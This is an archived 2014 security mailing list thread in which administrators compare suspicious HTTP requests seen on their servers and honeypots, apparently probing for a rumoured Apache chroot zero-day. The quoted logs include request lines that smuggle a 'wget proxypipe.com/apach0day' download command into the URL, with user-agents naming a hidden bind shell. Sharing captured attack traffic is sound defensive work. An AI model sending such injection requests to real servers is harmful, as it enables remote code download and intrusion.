PaulDotCom mailing list archives

Re: [Security Weekly] apache chroot 0day?


From: Bruno Savioli <bruno () savioli org>
Date: Tue, 29 Jul 2014 09:44:04 +0100

I got the same on 7 different servers.
Plus, I also had this, from the same IP on 25/06 on 3 of my servers:

GET /rutorrent HTTP/1.0
User-Agent: Chrome 14.2.0 Mozilla (Gecko)
Accept: */*

Bruno


On 29 July 2014 08:05, Lutz Schildt <ls () lsmooth de> wrote:

On 28.07.2014 21:26, Lutz Schildt wrote:

 I've seen the same request on one of my honeypots and a second one a few
hours later from the same IP:


GET/?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget
proxypipe.com/apach0day;
HTTP/1.0
User-agent: chroot-apach0day
Referrer: /xA/x0a/x06

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

Another one:

GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget
proxypipe.com/apach0day;
HTTP/1.0
User-agent: chroot-apach0day-HIDDEN BINDSHELL-ESTAB
Referrer: /xA/x0a/x06HIDDENSHELL--ESTABLISHED

-- 
- Bruno